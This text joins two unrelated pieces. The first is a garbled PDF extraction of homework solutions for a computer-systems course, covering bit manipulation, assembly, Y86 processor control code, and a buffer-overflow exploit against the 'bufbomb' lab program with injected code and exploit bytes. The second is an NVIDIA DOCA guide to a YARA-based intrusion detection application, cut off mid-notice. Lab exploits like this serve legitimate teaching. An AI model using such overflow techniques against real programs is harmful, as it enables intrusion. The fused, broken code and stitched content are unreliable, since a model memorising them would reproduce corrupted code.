that1<<32yields0on some32-bit machines and1on others is common source of bugs.A.The C standard does not define the effect of a shift by32of a32-bit datum.On the SPARC(andmany other machines),the expression x<<k shifts by,i.e.,it ignores all but the least significant5bits of the shift amount.Thus,the expression1<<32yields1.pute beyond_msb as2<<31.C.We cannot shift by more than15bits at a time,but we can compose multiple shifts to get thedesired effect.Thus,we can compute set_msb as2<<15<<15,and beyond_msb as set_msb<<1.Problem2.46Solution:This problem highlights the difference between zero extension and sign extension.It also provides an excuse to show an interesting trick that compilers often use to use shifting to perform masking and sign extension.A.The function does not perform any sign extension.For example,if we attempt to extract byte0fromword0xFF,we will get255,rather than.B.The following code uses a well-known trick for using shifts to isolate a particular range of bits and toperform sign extension at the same time.First,we perform a left shift so that the most significant bit of the desired byte is at bit position31.Then we right shift by24,moving the byte into the proper position and peforming sign extension at the same time.4CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 3int left=word<<((3-bytenum)<<3);4return left>>24;5}Problem2.48Solution:This problem lets students rework the proof that complement plus increment performs negation.We make use of the property that two’s complement addition is associative,commutative,and has additive ing C notation,if we define y to be x-1,then we have˜y+1equal to-y,and hence˜y equals -y+1.Substituting gives the expression-(x-1)+1,which equals-x.Problem2.49Solution:This problem requires a fairly deep understanding of two’s complement arithmetic.Some machines only provide one form of multiplication,and hence the trick shown in the code here is actually required to perform that actual form.As seen in Equation2.16we have.Thefinal term has no effect on the-bit representation of,but the middle term represents a correction factor that must be added to the high order bits.This is implemented as follows:code/data/uhp-ans.c Problem2.50Solution:Patterns of the kind shown here frequently appear in compiled code.1.2.CHAPTER2:REPRESENTING AND MANIPULATING INFORMATION5A.:x+(x<<2)B.:x+(x<<3)C.:(x<<4)-(x<<1)D.:(x<<3)-(x<<6)Problem2.51Solution:Bit patterns similar to these arise in many applications.Many programmers provide them directly in hex-adecimal,but it would be better if they could express them in more abstract ways.A..˜((1<<k)-1)B..((1<<k)-1)<<jProblem2.52Solution:Byte extraction and insertion code is useful in many contexts.Being able to write this sort of code is an important skill to foster.code/data/rbyte-ans.c Problem2.53Solution:These problems are fairly tricky.They require generating masks based on the shift amounts.Shift value k equal to0must be handled as a special case,since otherwise we would be generating the mask by performing a left shift by32.6CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1unsigned srl(unsigned x,int k)2{3/*Perform shift arithmetically*/4unsigned xsra=(int)x>>k;5/*Make mask of low order32-k bits*/6unsigned mask=k?((1<<(32-k))-1):˜0;78return xsra&mask;9}code/data/rshift-ans.c 1int sra(int x,int k)2{3/*Perform shift logically*/4int xsrl=(unsigned)x>>k;5/*Make mask of high order k bits*/6unsigned mask=k?˜((1<<(32-k))-1):0;78return(x<0)?mask|xsrl:xsrl;9}.1.2.CHAPTER2:REPRESENTING AND MANIPULATING INFORMATION7B.(a)For,we have,,code/data/floatge-ans.c 1int float_ge(float x,float y)2{3unsigned ux=f2u(x);4unsigned uy=f2u(y);5unsigned sx=ux>>31;6unsigned sy=uy>>31;78return9(ux<<1==0&&uy<<1==0)||/*Both are zero*/10(!sx&&sy)||/*x>=0,y<0*/11(!sx&&!sy&&ux>=uy)||/*x>=0,y>=0*/12(sx&&sy&&ux<=uy);/*x<0,y<0*/13},8CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS This exercise is of practical value,since Intel-compatible processors perform all of their arithmetic in ex-tended precision.It is interesting to see how adding a few more bits to the exponent greatly increases the range of values that can be represented.Description Extended precisionValueSmallest denorm.Largest norm.Problem2.59Solution:We have found that working throughfloating point representations for small word sizes is very instructive. Problems such as this one help make the description of IEEEfloating point more concrete.Description8000Smallest value4700Largest denormalized———code/data/fpwr2-ans.c1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS91/*Compute2**x*/2float fpwr2(int x){34unsigned exp,sig;5unsigned u;67if(x<-149){8/*Too small.Return0.0*/9exp=0;10sig=0;11}else if(x<-126){12/*Denormalized result*/13exp=0;14sig=1<<(x+149);15}else if(x<128){16/*Normalized result.*/17exp=x+127;18sig=0;19}else{20/*Too big.Return+oo*/21exp=255;22sig=0;23}24u=exp<<23|sig;25return u2f(u);26}10CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS int decode2(int x,int y,int z){int t1=y-z;int t2=x*t1;int t3=(t1<<31)>>31;int t4=t3ˆt2;return t4;}Problem3.32Solution:This code example demonstrates one of the pedagogical challenges of using a compiler to generate assembly code examples.Seemingly insignificant changes in the C code can yield very different results.Of course, students will have to contend with this property as work with machine-generated assembly code anyhow. They will need to be able to decipher many different code patterns.This problem encourages them to think in abstract terms about one such pattern.The following is an annotated version of the assembly code:1movl8(%ebp),%edx x2movl12(%ebp),%ecx y3movl%edx,%eax4subl%ecx,%eax result=x-y5cmpl%ecx,%edx Compare x:y6jge.L3if>=goto done:7movl%ecx,%eax8subl%edx,%eax result=y-x9.L3:done:A.When,it will computefirst and then.When it just computes.B.The code for then-statement gets executed unconditionally.It then jumps over the code for else-statement if the test is false.C.then-statementt=test-expr;if(t)goto done;else-statementdone:D.The code in then-statement must not have any side effects,other than to set variables that are also setin else-statement.1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS11Problem3.33Solution:This problem requires students to reason about the code fragments that implement the different branches of a switch statement.For this code,it also requires understanding different forms of pointer dereferencing.A.In line29,register%edx is copied to register%eax as the return value.From this,we can infer that%edx holds result.B.The original C code for the function is as follows:1/*Enumerated type creates set of constants numbered0and upward*/2typedef enum{MODE_A,MODE_B,MODE_C,MODE_D,MODE_E}mode_t;34int switch3(int*p1,int*p2,mode_t action)5{6int result=0;7switch(action){8case MODE_A:9result=*p1;10*p1=*p2;11break;12case MODE_B:13*p2+=*p1;14result=*p2;15break;16case MODE_C:17*p2=15;18result=*p1;19break;20case MODE_D:21*p2=*p1;22/*Fall Through*/23case MODE_E:24result=17;25break;26default:27result=-1;28}29return result;30}Problem3.34Solution:This problem gives students practice analyzing disassembled code.The switch statement contains all the features one can imagine—cases with multiple labels,holes in the range of possible case values,and cases that fall through.12CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1int switch_prob(int x)2{3int result=x;45switch(x){6case50:7case52:8result<<=2;9break;10case53:11result>>=2;12break;13case54:14result*=3;15/*Fall through*/16case55:17result*=result;18/*Fall through*/19default:20result+=10;21}2223return result;24}code/asm/varprod-ans.c 1int var_prod_ele_opt(var_matrix A,var_matrix B,int i,int k,int n) 2{3int*Aptr=&A[i*n];4int*Bptr=&B[k];5int result=0;6int cnt=n;78if(n<=0)9return result;1011do{12result+=(*Aptr)*(*Bptr);13Aptr+=1;14Bptr+=n;15cnt--;1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS13 16}while(cnt);1718return result;19}code/asm/structprob-ans.c 1typedef struct{2int idx;3int x[4];4}a_struct;14CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1/*Read input line and write it back*/2/*Code will work for any buffer size.Bigger is more time-efficient*/ 3#define BUFSIZE644void good_echo()5{6char buf[BUFSIZE];7int i;8while(1){9if(!fgets(buf,BUFSIZE,stdin))10return;/*End of file or error*/11/*Print characters in buffer*/12for(i=0;buf[i]&&buf[i]!=’\n’;i++)13if(putchar(buf[i])==EOF)14return;/*Error*/15if(buf[i]==’\n’){16/*Reached terminating newline*/17putchar(’\n’);18return;19}20}21}An alternative implementation is to use getchar to read the characters one at a time.Problem3.38Solution:Successfully mounting a buffer overflow attack requires understanding many aspects of machine-level pro-grams.It is quite intriguing that by supplying a string to one function,we can alter the behavior of another function that should always return afixed value.In assigning this problem,you should also give students a stern lecture about ethical computing practices and dispell any notion that hacking into systems is a desirable or even acceptable thing to do.Our solution starts by disassembling bufbomb,giving the following code for getbuf: 1080484f4<getbuf>:280484f4:55push%ebp380484f5:89e5mov%esp,%ebp480484f7:83ec18sub$0x18,%esp580484fa:83c4f4add$0xfffffff4,%esp680484fd:8d45f4lea0xfffffff4(%ebp),%eax78048500:50push%eax88048501:e86a ff ff ff call8048470<getxs>98048506:b801000000mov$0x1,%eax10804850b:89ec mov%ebp,%esp11804850d:5d pop%ebp12804850e:c3ret13804850f:90nopWe can see on line6that the address of buf is12bytes below the saved value of%ebp,which is4bytes below the return address.Our strategy then is to push a string that contains12bytes of code,the saved value1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS15 of%ebp,and the address of the start of the buffer.To determine the relevant values,we run GDB as follows:1.First,we set a breakpoint in getbuf and run the program to that point:(gdb)break getbuf(gdb)runComparing the stopping point to the disassembly,we see that it has already set up the stack frame.2.We get the value of buf by computing a value relative to%ebp:(gdb)print/x(%ebp+12)This gives0xbfffefbc.3.Wefind the saved value of register%ebp by dereferencing the current value of this register:(gdb)print/x*$ebpThis gives0xbfffefe8.4.Wefind the value of the return pointer on the stack,at offset4relative to%ebp:(gdb)print/x*((int*)$ebp+1)This gives0x8048528We can now put this information together to generate assembly code for our attack:1pushl$0x8048528Put correct return pointer back on stack2movl$0xdeadbeef,%eax Alter return value3ret Re-execute return4.align4Round up to125.long0xbfffefe8Saved value of%ebp6.long0xbfffefbc Location of buf7.long0x00000000PaddingNote that we have used the.align statement to get the assembler to insert enough extra bytes to use up twelve bytes for the code.We added an extra4bytes of0s at the end,because in some cases OBJDUMP would not generate the complete byte pattern for the data.These extra bytes(plus the termininating null byte)will overflow into the stack frame for test,but they will not affect the program behavior. Assembling this code and disassembling the object code gives us the following:10:6828850408push$0x804852825:b8ef be ad de mov$0xdeadbeef,%eax3a:c3ret4b:90nop Byte inserted for alignment.5c:e8ef ff bf bc call0xbcc00000Invalid disassembly.611:ef out%eax,(%dx)Trying to diassemble712:ff(bad)data813:bf00000000mov$0x0,%edi16CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS From this we can read off the byte sequence:6828850408b8ef be ad de c390e8ef ff bf bc ef ff bf00000000Problem3.39Solution:This problem is a variant on the asm examples in the text.The code is actually fairly simple.It relies on the fact that asm outputs can be arbitrary lvalues,and hence we can use dest[0]and dest[1]directly in the output list.code/asm/asmprobs-ans.c Problem3.40Solution:For this example,students essentially have to write the entire function in assembly.There is no(apparent) way to interface between thefloating point registers and the C code using extended asm.code/asm/fscale.c1.4.CHAPTER4:PROCESSOR ARCHITECTURE17 1.4Chapter4:Processor ArchitectureProblem4.32Solution:This problem makes students carefully examine the tables showing the computation stages for the different instructions.The steps for iaddl are a hybrid of those for irmovl and OPl.StageFetchrA:rB M PCvalP PCExecuteR rB valEPC updateleaveicode:ifun M PCDecodevalB RvalE valBMemoryWrite backR valMPC valPProblem4.34Solution:The following HCL code includes implementations of both the iaddl instruction and the leave instruc-tions.The implementations are fairly straightforward given the computation steps listed in the solutions to problems4.32and4.33.You can test the solutions using the test code in the ptest subdirectory.Make sure you use command line argument‘-i.’18CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1####################################################################2#HCL Description of Control for Single Cycle Y86Processor SEQ#3#Copyright(C)Randal E.Bryant,David R.O’Hallaron,2002#4####################################################################56##This is the solution for the iaddl and leave problems78####################################################################9#C Include’s.Don’t alter these#10#################################################################### 1112quote’#include<stdio.h>’13quote’#include"isa.h"’14quote’#include"sim.h"’15quote’int sim_main(int argc,char*argv[]);’16quote’int gen_pc(){return0;}’17quote’int main(int argc,char*argv[])’18quote’{plusmode=0;return sim_main(argc,argv);}’1920####################################################################21#Declarations.Do not change/remove/delete any of these#22#################################################################### 2324#####Symbolic representation of Y86Instruction Codes#############25intsig INOP’I_NOP’26intsig IHALT’I_HALT’27intsig IRRMOVL’I_RRMOVL’28intsig IIRMOVL’I_IRMOVL’29intsig IRMMOVL’I_RMMOVL’30intsig IMRMOVL’I_MRMOVL’31intsig IOPL’I_ALU’32intsig IJXX’I_JMP’33intsig ICALL’I_CALL’34intsig IRET’I_RET’35intsig IPUSHL’I_PUSHL’36intsig IPOPL’I_POPL’37#Instruction code for iaddl instruction38intsig IIADDL’I_IADDL’39#Instruction code for leave instruction40intsig ILEAVE’I_LEAVE’4142#####Symbolic representation of Y86Registers referenced explicitly##### 43intsig RESP’REG_ESP’#Stack Pointer44intsig REBP’REG_EBP’#Frame Pointer45intsig RNONE’REG_NONE’#Special value indicating"no register"4647#####ALU Functions referenced explicitly##### 48intsig ALUADD’A_ADD’#ALU should add its arguments4950#####Signals that can be referenced by control logic####################1.4.CHAPTER4:PROCESSOR ARCHITECTURE195152#####Fetch stage inputs#####53intsig pc’pc’#Program counter54#####Fetch stage computations#####55intsig icode’icode’#Instruction control code56intsig ifun’ifun’#Instruction function57intsig rA’ra’#rA field from instruction58intsig rB’rb’#rB field from instruction59intsig valC’valc’#Constant from instruction60intsig valP’valp’#Address of following instruction 6162#####Decode stage computations#####63intsig valA’vala’#Value from register A port64intsig valB’valb’#Value from register B port 6566#####Execute stage computations#####67intsig valE’vale’#Value computed by ALU68boolsig Bch’bcond’#Branch test6970#####Memory stage computations#####71intsig valM’valm’#Value read from memory727374####################################################################75#Control Signal Definitions.#76#################################################################### 7778################Fetch Stage################################### 7980#Does fetched instruction require a regid byte?81bool need_regids=82icode in{IRRMOVL,IOPL,IPUSHL,IPOPL,83IIADDL,84IIRMOVL,IRMMOVL,IMRMOVL};8586#Does fetched instruction require a constant word?87bool need_valC=88icode in{IIRMOVL,IRMMOVL,IMRMOVL,IJXX,ICALL,IIADDL};8990bool instr_valid=icode in91{INOP,IHALT,IRRMOVL,IIRMOVL,IRMMOVL,IMRMOVL,92IIADDL,ILEAVE,93IOPL,IJXX,ICALL,IRET,IPUSHL,IPOPL};9495################Decode Stage################################### 9697##What register should be used as the A source?98int srcA=[99icode in{IRRMOVL,IRMMOVL,IOPL,IPUSHL}:rA;20CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 101icode in{IPOPL,IRET}:RESP;1021:RNONE;#Don’t need register103];104105##What register should be used as the B source?106int srcB=[107icode in{IOPL,IRMMOVL,IMRMOVL}:rB;108icode in{IIADDL}:rB;109icode in{IPUSHL,IPOPL,ICALL,IRET}:RESP;110icode in{ILEAVE}:REBP;1111:RNONE;#Don’t need register112];113114##What register should be used as the E destination?115int dstE=[116icode in{IRRMOVL,IIRMOVL,IOPL}:rB;117icode in{IIADDL}:rB;118icode in{IPUSHL,IPOPL,ICALL,IRET}:RESP;119icode in{ILEAVE}:RESP;1201:RNONE;#Don’t need register121];122123##What register should be used as the M destination?124int dstM=[125icode in{IMRMOVL,IPOPL}:rA;126icode in{ILEAVE}:REBP;1271:RNONE;#Don’t need register128];129130################Execute Stage###################################131132##Select input A to ALU133int aluA=[134icode in{IRRMOVL,IOPL}:valA;135icode in{IIRMOVL,IRMMOVL,IMRMOVL}:valC;136icode in{IIADDL}:valC;137icode in{ICALL,IPUSHL}:-4;138icode in{IRET,IPOPL}:4;139icode in{ILEAVE}:4;140#Other instructions don’t need ALU141];142143##Select input B to ALU144int aluB=[145icode in{IRMMOVL,IMRMOVL,IOPL,ICALL,146IPUSHL,IRET,IPOPL}:valB;147icode in{IIADDL,ILEAVE}:valB;148icode in{IRRMOVL,IIRMOVL}:0;149#Other instructions don’t need ALU1.4.CHAPTER4:PROCESSOR ARCHITECTURE21151152##Set the ALU function153int alufun=[154icode==IOPL:ifun;1551:ALUADD;156];157158##Should the condition codes be updated?159bool set_cc=icode in{IOPL,IIADDL};160161################Memory Stage###################################162163##Set read control signal164bool mem_read=icode in{IMRMOVL,IPOPL,IRET,ILEAVE};165166##Set write control signal167bool mem_write=icode in{IRMMOVL,IPUSHL,ICALL};168169##Select memory address170int mem_addr=[171icode in{IRMMOVL,IPUSHL,ICALL,IMRMOVL}:valE;172icode in{IPOPL,IRET}:valA;173icode in{ILEAVE}:valA;174#Other instructions don’t need address175];176177##Select memory input data178int mem_data=[179#Value from register180icode in{IRMMOVL,IPUSHL}:valA;181#Return PC182icode==ICALL:valP;183#Default:Don’t write anything184];185186################Program Counter Update############################187188##What address should instruction be fetched at189190int new_pc=[191#e instruction constant192icode==ICALL:valC;193#Taken e instruction constant194icode==IJXX&&Bch:valC;195#Completion of RET e value from stack196icode==IRET:valM;197#Default:Use incremented PC1981:valP;199];22CHAPTER 1.SOLUTIONS TO HOMEWORK PROBLEMSME DMispredictE DM E DM M E D E DMGen./use 1W E DM Gen./use 2WE DM Gen./use 3W Figure 1.1:Pipeline states for special control conditions.The pairs connected by arrows can arisesimultaneously.code/arch/pipe-nobypass-ans.hcl1.4.CHAPTER4:PROCESSOR ARCHITECTURE232#At most one of these can be true.3bool F_bubble=0;4bool F_stall=5#Stall if either operand source is destination of6#instruction in execute,memory,or write-back stages7d_srcA!=RNONE&&d_srcA in8{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE}||9d_srcB!=RNONE&&d_srcB in10{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE}||11#Stalling at fetch while ret passes through pipeline12IRET in{D_icode,E_icode,M_icode};1314#Should I stall or inject a bubble into Pipeline Register D?15#At most one of these can be true.16bool D_stall=17#Stall if either operand source is destination of18#instruction in execute,memory,or write-back stages19#but not part of mispredicted branch20!(E_icode==IJXX&&!e_Bch)&&21(d_srcA!=RNONE&&d_srcA in22{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE}||23d_srcB!=RNONE&&d_srcB in24{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE});2526bool D_bubble=27#Mispredicted branch28(E_icode==IJXX&&!e_Bch)||29#Stalling at fetch while ret passes through pipeline30!(E_icode in{IMRMOVL,IPOPL}&&E_dstM in{d_srcA,d_srcB})&&31#but not condition for a generate/use hazard32!(d_srcA!=RNONE&&d_srcA in33{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE}||34d_srcB!=RNONE&&d_srcB in35{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE})&&36IRET in{D_icode,E_icode,M_icode};3738#Should I stall or inject a bubble into Pipeline Register E?39#At most one of these can be true.40bool E_stall=0;41bool E_bubble=42#Mispredicted branch43(E_icode==IJXX&&!e_Bch)||44#Inject bubble if either operand source is destination of45#instruction in execute,memory,or write back stages46d_srcA!=RNONE&&47d_srcA in{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE}|| 48d_srcB!=RNONE&&49d_srcB in{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE};5024CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 52#At most one of these can be true.53bool M_stall=0;54bool M_bubble=0;code/arch/pipe-full-ans.hcl 1####################################################################2#HCL Description of Control for Pipelined Y86Processor#3#Copyright(C)Randal E.Bryant,David R.O’Hallaron,2002#4####################################################################56##This is the solution for the iaddl and leave problems78####################################################################9#C Include’s.Don’t alter these#10#################################################################### 1112quote’#include<stdio.h>’13quote’#include"isa.h"’14quote’#include"pipeline.h"’15quote’#include"stages.h"’16quote’#include"sim.h"’17quote’int sim_main(int argc,char*argv[]);’18quote’int main(int argc,char*argv[]){return sim_main(argc,argv);}’1920####################################################################21#Declarations.Do not change/remove/delete any of these#22#################################################################### 2324#####Symbolic representation of Y86Instruction Codes#############25intsig INOP’I_NOP’26intsig IHALT’I_HALT’27intsig IRRMOVL’I_RRMOVL’28intsig IIRMOVL’I_IRMOVL’29intsig IRMMOVL’I_RMMOVL’30intsig IMRMOVL’I_MRMOVL’31intsig IOPL’I_ALU’32intsig IJXX’I_JMP’33intsig ICALL’I_CALL’34intsig IRET’I_RET’1.4.CHAPTER4:PROCESSOR ARCHITECTURE25 36intsig IPOPL’I_POPL’37#Instruction code for iaddl instruction38intsig IIADDL’I_IADDL’39#Instruction code for leave instruction40intsig ILEAVE’I_LEAVE’4142#####Symbolic representation of Y86Registers referenced explicitly##### 43intsig RESP’REG_ESP’#Stack Pointer44intsig REBP’REG_EBP’#Frame Pointer45intsig RNONE’REG_NONE’#Special value indicating"no register"4647#####ALU Functions referenced explicitly##########################48intsig ALUADD’A_ADD’#ALU should add its arguments4950#####Signals that can be referenced by control logic##############5152#####Pipeline Register F##########################################5354intsig F_predPC’pc_curr->pc’#Predicted value of PC5556#####Intermediate Values in Fetch Stage###########################5758intsig f_icode’if_id_next->icode’#Fetched instruction code59intsig f_ifun’if_id_next->ifun’#Fetched instruction function60intsig f_valC’if_id_next->valc’#Constant data of fetched instruction 61intsig f_valP’if_id_next->valp’#Address of following instruction 6263#####Pipeline Register D##########################################64intsig D_icode’if_id_curr->icode’#Instruction code65intsig D_rA’if_id_curr->ra’#rA field from instruction66intsig D_rB’if_id_curr->rb’#rB field from instruction67intsig D_valP’if_id_curr->valp’#Incremented PC6869#####Intermediate Values in Decode Stage#########################7071intsig d_srcA’id_ex_next->srca’#srcA from decoded instruction72intsig d_srcB’id_ex_next->srcb’#srcB from decoded instruction73intsig d_rvalA’d_regvala’#valA read from register file74intsig d_rvalB’d_regvalb’#valB read from register file 7576#####Pipeline Register E##########################################77intsig E_icode’id_ex_curr->icode’#Instruction code78intsig E_ifun’id_ex_curr->ifun’#Instruction function79intsig E_valC’id_ex_curr->valc’#Constant data80intsig E_srcA’id_ex_curr->srca’#Source A register ID81intsig E_valA’id_ex_curr->vala’#Source A value82intsig E_srcB’id_ex_curr->srcb’#Source B register ID83intsig E_valB’id_ex_curr->valb’#Source B value84intsig E_dstE’id_ex_curr->deste’#Destination E register ID。

NVIDIA DOCA YARA Inspection Application GuideApplication GuideTable of ContentsChapter 1. Introduction (1)Chapter 2. System Design (2)Chapter 3. Application Architecture (5)Chapter 4. DOCA Libraries (7)Chapter 5. Configuration Flow (8)Chapter 6. Dependencies (10)Chapter 7. Running the Application (11)Chapter 8. Arg Parser DOCA Flags (14)Chapter 9. References (17)Chapter 1.IntroductionYARA inspection monitors all processes in the host system for specific YARA rules using the DOCA App Shield library.This security capability helps identify malware detection patterns in host processes from an independent and trusted DPU. This is an innovative intrusion detection system (IDS) as it is designed to run independently on the DPU's Arm cores without hindering the host.This DOCA App Shield based application provides the capability to read, analyze, and authenticate the host (bare metal/VM) memory directly from the DPU.Using the library, this application scans host processes and looks for pre-definedYARA rules. After every scan iteration, the application indicates if any of the rules matched. Once there is a match, the application reports which rules were detected in which process. The reports are both printed to the console and exported to the DOCA Telemetry Service (DTS) using inter-process communication (IPC).This guide describes how to build YARA inspection using the DOCA App Shield library which leverages DPU abilities such as hardware-based DMA, integrity, and more.Note: As the DOCA App Shield library only supports the YARA API for Windows hosts, thisapplication can only be used to inspect Windows hosts.Chapter 2.System DesignThe host's involvement is limited to generating the required ZIP and JSON files to pass to the DPU. This is done before the app is triggered, when the host is still in a "safe" state.Generating the needed files can be done by running DOCA App Shield'sdoca_apsh_config.py tool on the host. See NVIDIA DOCA App Shield Programming Guide for more info.System DesignSystem DesignChapter 3.Application ArchitectureThe user creates the ZIP and JSON files using the DOCA tool doca_apsh_config.py and copies them to the DPU.The application can report YARA rules detection to the:‣File‣Terminal‣DTS1.The files are generated by running doca_apsh_config.py on the host against theprocess at time zero.2.The following steps recur at regular time intervals:a).The YARA inspection app requests a list of all apps from the DOCA App Shieldlibrary.b).The app loops over all processes and checks for YARA rules match using theDOCA App Shield library.c).If YARA rules are found (1 or more), the YARA attestation app reports results witha timestamp and details about the process and rules to:Application Architecture‣Local telemetry files – a folder and files representing the data a real DTS would have receivedNote: These files are used for the purpose of this example only as normally thisdata is not exported into user-readable files.‣DOCA log‣DTS IPC interface (even if no DTS is active)3.The App Shield agent exits on first YARA rule detection.Chapter 4.DOCA LibrariesThis application leverages following DOCA libraries:‣DOCA App Shield library‣DOCA Telemetry libraryChapter 5.Configuration Flow1.Parse application argument.a).Initialize arg parser resources and register DOCA general parameters.doca_argp_init();b).Register application parameters.register_apsh_params();c).Parse app flags.doca_argp_start();2.Initialize DOCA App Shield lib context.a).Create lib context.doca_apsh_create();b).Set DMA device for lib.open_doca_device_with_ibdev_name();doca_apsh_dma_dev_set();c).Start the context.doca_apsh_start();apsh_system_init();3.Initialize DOCA App Shield lib system context handler.a).Get the representor of the remote PCIe function exposed to the system.open_doca_device_rep_with_vuid();b).Create and start the system context handler.doca_apsh_system_create();doca_apsh_sys_os_symbol_map_set();doca_apsh_sys_mem_region_set();doca_apsh_sys_dev_set();doca_apsh_sys_os_type_set();doca_apsh_system_start();4.Telemetry initialization.telemetry_start();a).Initialize a new telemetry schema.b).Register YARA type event.c).Set up output to file (in addition to default IPC).d).Start the telemetry schema.e).Initialize and start a new DTS source with the gethostname() name as source ID.5.Loop until YARA rule is matched.Configuration Flowa).Get all processes from the host.doca_apsh_processes_get();b).Check for YARA rule identification and send a DTS event if there is a match.doca_apsh_yara_get();if (yara_matches_size != 0) {/* event fill logicdoca_telemetry_source_report();DOCA_LOG_INFO();sleep();6.Telemetry destroy.telemetry_destroy();7.YARA inspection clean-up.doca_apsh_system_destroy();doca_apsh_destroy();doca_dev_close();doca_dev_rep_close();8.Arg parser destroy.doca_argp_destroy();Chapter 6.Dependencies‣Firmware version 24.32.1010 or greater‣BFB Ubuntu 22.04 only‣Supported only for Windows hostsChapter 7.Running the Application1.Refer to the following documents:‣NVIDIA DOCA Installation Guide for Linux for details on how to install BlueField-related software.‣NVIDIA DOCA Troubleshooting Guide for any issue you may encounter with the installation, compilation, or execution of DOCA applications.‣NVIDIA DOCA Applications Overview for additional compilation instructions and development tips of DOCA applications.2.The App Shield Agent binary is located under /opt/mellanox/doca/applications/ yara_inspection/bin/doca_yara_inspection. To build the applications together, run:cd /opt/mellanox/doca/applications/meson buildninja -C build3.To build only the App Shield Agent application:a).Edit the following flags in /opt/mellanox/doca/applications/meson_options.txt:‣Set enable_all_applications to false‣Set enable_yara_inspection to trueb).Run the commands in step 2.Note: doca_yara_inspection is created under ./build/yara_inspection/src/.Application usage:Usage: doca_yara_inspection [DOCA Flags] [Program Flags]DOCA Flags:-h, --help Print a help synopsis-v, --version Print program version information-l, --log-level Set the log level for the program<CRITICAL=20, ERROR=30, WARNING=40, INFO=50, DEBUG=60>Program Flags:-m, --memr <path> System memory regions map-f, --vuid VUID of the System device-d, --dma DMA device name-o, --osym <path> System OS symbol map path-t, --time <seconds> Scan time interval in secondsNote: For additional information on the application, use the -h flag:/opt/mellanox/doca/applications/yara_inspection/bin/doca_yara_inspection -h4.The following steps must be done only once.a).Configure the BlueField's firmware.i.On the BlueField system, configure the PF base address register and NVMEemulation. Run:dpu> mlxconfig -d /dev/mst/mt41686_pciconf0 s PF_BAR2_SIZE=2PF_BAR2_ENABLE=1 NVME_EMULATION_ENABLE=1ii.Perform a cold boot from the host. Run:host> ipmitool power cycleNote: These configurations can be checked using the following command:dpu> mlxconfig -d /dev/mst/mt41686_pciconf0 q | grep -E "NVME|BAR"b).Perform IOMMU passthrough. This stage is only necessary in cases where IOMMUis not enabled by default (e.g., when the host is using an AMD CPU).Note: Skip this step if you are not sure whether you need it. Return to it only ifDMA fails with a message in dmesg similar to the following:host> dmesg[ 3839.822897] mlx5_core 0000:81:00.0: AMD-Vi: Event logged[IO_PAGE_FAULT domain=0x0047 address=0x2a0aff8 flags=0x0000]i.Locate your OS's grub file (most likely /boot/grub/grub.conf, /boot/grub2/grub.cfg, or /etc/default/grub) and open it for editing. Run:host> vim /etc/default/grubii.Search for the line defining GRUB_CMDLINE_LINUX_DEFAULT and add the argument iommu=pt. For example:GRUB_CMDLINE_LINUX_DEFAULT="iommu=pt <intel/amd>_iommu=on"iii.Run:‣For Ubuntu:host> sudo update-grubhost> ipmitool power cycle‣For CentOS:host> grub2-mkconfig -o /boot/grub2/grub.cfghost> ipmitool power cyclec).For Windows targets only, turn off Hyper-V capability5.Running the application on BlueField:‣Pre-run setup:a).The DOCA App Shield library uses huge pages for DMA buffers. Therefore, theuser must allocate 42 huge pages. Run:dpu> nr_huge=$(cat /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages)nr_huge=$((42+$nr_huge))sudo echo $nr_huge > /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepagesb).Create the ZIP and JSON files. Run:Note: If the kernel and process .exe have not changed, there no need to redothis step.target-system> cd /opt/mellanox/doca/tools/target-system> python3 doca_apsh_config.py <pid-of-process-to-monitor> --os <windows/linux> --path <path to dwarf2json executable or pdbparse-to-json.py>target-system> cp /opt/mellanox/doca/tools/*.* <shared-folder-with-baremetal>dpu> scp <shared-folder-with-baremetal>/* <path-to-app-shield-binary>If the target system does not have DOCA installed, the script can be copiedfrom the BlueField.The required dwaf2json and pdbparse-to-json.py are not provided withDOCA. Follow the NVIDIA DOCA App Shield Programming Guide for moreinformation.‣CLI example for running the app:dpu> /opt/mellanox/doca/applications/yara_inspection/bin/doca_yara_inspection -m mem_regions.json -o symbols.json -f MT2125X03335MLNXS0D0F0VF1 -d mlx5_0 -t 3Chapter 8.Arg Parser DOCA Flags Refer to NVIDIA DOCA Arg Parser Programming Guide for more information.Chapter 9.References‣/opt/mellanox/doca/applications/yara_inspection/srcNoticeThis document is provided for information purposes only and shall not be regarded as a warranty of a certain functionality, condition, or quality of a product. NVIDIA Corporation nor any of its direct or indirect subsidiaries and affiliates (collectively: “NVIDIA”) make no representations or warranties, expressed or implied, as to the accuracy or completeness of the information contained in this document and assume no responsibility for any errors contained herein. NVIDIA shall have no liability for the consequences or use of such information or for any infringement of patents or other rights of third parties that may result from its use. This document is not a commitment to develop, release, or deliver any Material (defined below), code, or functionality.NVIDIA reserves the right to make corrections, modifications, enhancements, improvements, and any other changes to this document, at any time without notice.Customer should obtain the latest relevant information before placing orders and should verify that such information is current and complete.NVIDIA products are sold subject to the NVIDIA standard terms and conditions of sale supplied at the time of order acknowledgement, unless otherwise agreed in an individual sales agreement signed by authorized representatives of NVIDIA and customer (“Terms of Sale”). NVIDIA hereby expressly objects to applying any customer general terms and 